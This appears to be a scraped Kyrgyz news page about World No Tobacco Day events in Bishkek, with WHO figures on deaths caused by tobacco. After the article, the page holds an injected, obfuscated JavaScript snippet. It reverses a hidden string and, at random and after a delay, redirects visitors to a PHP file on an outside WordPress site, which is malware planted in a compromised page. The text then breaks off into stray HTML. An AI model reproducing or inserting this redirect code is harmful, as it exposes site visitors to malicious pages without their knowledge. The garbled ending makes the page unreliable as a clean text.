Бишкекте, 31-майда Бүткүл дүйнөлүк тамекиге каршы күрөшүү күнү белгиленди. Бул күнгө карата иш-чараны Саламаттыкты сактоо жана социалдык өнүктүрүү министрлиги уюштурду. Эске салсак, 1988-жылы Бүткүл дүйнөлүк саламаттык сактоо ассамблеаясынын 42-отурумунда кабыл алынып, Бүткүл дүйнөлүк саламаттык сактоо уюму тарабынан «31-май тамекиге каршы күрөшүү күнү» деп жарыяланган. БДССУнун билдирүүсү боюнча жыл сайын Кыргызстанда болжол менен 6000 адам тамекинин айынан көз жумат. Ал эми дүйнө жүзү боюнча алып караганда бул көрсөткүч 6 миллион адамды түзөт, алардын ичинен 600 000 адам тамеки түтүнүнө кабылгандар экени тастыкталган. Тамеки чегүү 25тен ашуун оорулардын түрүнө алып келет алардын негизгилери болуп жүрөк, кан-тамыр оорулары, дем алуу органдарынын жабыркашы жана бир нече онкологиялык оорулар эсептелет. Дарыгерлер ошондой эле тамеки никотининде 7000ден ашуун уулуу зат бар экенин кошумчалашат.
{if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script>too.kg/wp-content/uploads/2021/06/bezymyannyj.jpg» alt=»» class=»wp-image-10967″/></figure>
<p></p>
</div><!-- .entry-content -->
<footer class=)